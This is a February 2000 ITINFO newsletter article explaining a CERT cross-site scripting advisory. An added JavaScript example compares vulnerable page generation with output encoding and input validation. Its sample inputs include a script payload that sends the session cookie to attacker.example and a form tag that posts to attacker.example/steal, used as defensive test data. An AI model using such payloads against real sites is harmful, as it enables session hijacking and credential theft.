New Security Headache
Hidden holes for hackers

Cross-Site Scripting Security Bug Hits the Web
by Dave Murphy
ISSN 1535-3613
CERT described in its alert how a web site may inadvertently include malicious HTML tags or script in a dynamically generated page when that page is built from unvalidated input from untrustworthy sources. This becomes a problem when the web server does not ensure that generated pages are properly encoded, so that untrusted text cannot be interpreted as script, and when input is not validated, so that malicious HTML is passed through and presented to the user.

Most web browsers can interpret scripts embedded in web pages. Such scripts may be written in a variety of scripting languages and are run by the client's browser, and most browsers are installed with script execution enabled by default. When a victim whose browser has scripts enabled views such a page, the injected code is executed without the victim's knowledge.

Scripting tags that can be embedded in this way include <SCRIPT>, <OBJECT>, <APPLET>, and <EMBED>. In addition to scripting tags, other HTML tags such as <FORM> can be abused by an attacker. For example, by embedding a malicious <FORM> tag at the right place, an intruder can change the behavior of an existing form and trick users into revealing sensitive information. Other HTML tags can be abused to alter the appearance of the page, insert unwanted or offensive images or sounds, or otherwise interfere with the intended appearance and behavior of the page.

This vulnerability is unusual because it is not limited to software from any one vendor: it is a flaw in how web sites build pages, not in any particular browser, so all web browsers on any operating system are at risk.
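The two defenses the advisory names, encoding generated output and validating input, shown next to the vulnerable pattern, as an added JavaScript example that is not part of the ITINFO article or of the CERT advisory. The search-results page, the allowed-character rule for a search term, the hypothetical attacker host attacker.example, and the sample inputs are all assumptions made for the illustration; it runs under Node.js with no network access.

```javascript
// Added example (not from the ITINFO article or the CERT advisory): a minimal
// model of a dynamically generated page that echoes a request parameter,
// first without output encoding (vulnerable), then with HTML entity encoding
// plus input validation.

// Characters that must be encoded before untrusted text is placed in HTML
// element content or in a double-quoted attribute value.
const HTML_ESCAPES = {
  '&': '&amp;',
  '<': '&lt;',
  '>': '&gt;',
  '"': '&quot;',
  "'": '&#39;',
};

function htmlEncode(text) {
  return String(text).replace(/[&<>"']/g, (ch) => HTML_ESCAPES[ch]);
}

// Input validation (assumed rule for this hypothetical page): a search term
// may contain only letters, digits, spaces and a few punctuation marks, at
// most 64 characters. Anything else is rejected outright rather than
// "cleaned", so the page never has to guess what a browser will do with a
// partially stripped tag.
const ALLOWED_QUERY = /^[A-Za-z0-9 .,'-]{1,64}$/;

function isValidQuery(query) {
  return ALLOWED_QUERY.test(query);
}

// Vulnerable pattern: untrusted input is concatenated straight into the page,
// so any tags it contains become part of the page the browser interprets.
function renderResultsUnsafe(query) {
  return '<html><body><h1>Results for: ' + query + '</h1></body></html>';
}

// Hardened pattern: reject malformed input, then encode whatever is echoed
// back so that '<' in the input reaches the browser as '&lt;'.
function renderResultsSafe(query) {
  if (!isValidQuery(query)) {
    return '<html><body><h1>Invalid search term</h1></body></html>';
  }
  return '<html><body><h1>Results for: ' + htmlEncode(query) + '</h1></body></html>';
}

// Stand-in for "the browser would act on this": does the generated HTML
// contain one of the tags the advisory lists as a raw tag (not entity-encoded)?
const ACTIVE_TAG = /<\s*(script|object|applet|embed|form)\b/i;

function containsActiveMarkup(html) {
  return ACTIVE_TAG.test(html);
}

// Constructed attack inputs in the spirit of the advisory: a benign term, a
// script that ships the session cookie to a hypothetical attacker host, and
// a FORM tag that redirects whatever the user types into it.
const SAMPLE_INPUTS = [
  'network security',
  '<script>document.location="http://attacker.example/?c="+document.cookie</script>',
  '<form action="http://attacker.example/steal" method="post">',
];

// Returns one row per sample input describing whether each page builder
// leaves active markup in the generated page.
function compareRenderers(inputs = SAMPLE_INPUTS) {
  return inputs.map((input) => ({
    input,
    unsafeHasActiveMarkup: containsActiveMarkup(renderResultsUnsafe(input)),
    safeHasActiveMarkup: containsActiveMarkup(renderResultsSafe(input)),
  }));
}

for (const row of compareRenderers()) {
  console.log(row);
}
```

Encoding on output is the defense that holds regardless of where the data came from; the allowlist is a second layer that also keeps out inputs the page has no business echoing at all. Note that the encoding table above is correct for element content and double-quoted attribute values only; text placed inside a script block, a URL, or a style attribute needs a different encoding for that context.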
Call for Comments
What do you think? Leave your comments on the message center.

References
CERT Advisory
Microsoft Security Site
Apache CSS Info
Message Center
Damar Group, Ltd. helps businesses use technology. ITINFO is again accepting sponsors. Sponsor messages are included in ITINFO's email newsletter and are permanently posted to DGL's website and online reference areas. ITINFO is an electronic publication of Damar Group, Ltd., publisher of Training Express computer learning guides. Comments and submissions to info@dgl.com. Previous issues are on our website at http://dgl.com/itinfo/.
updated February 3, 2000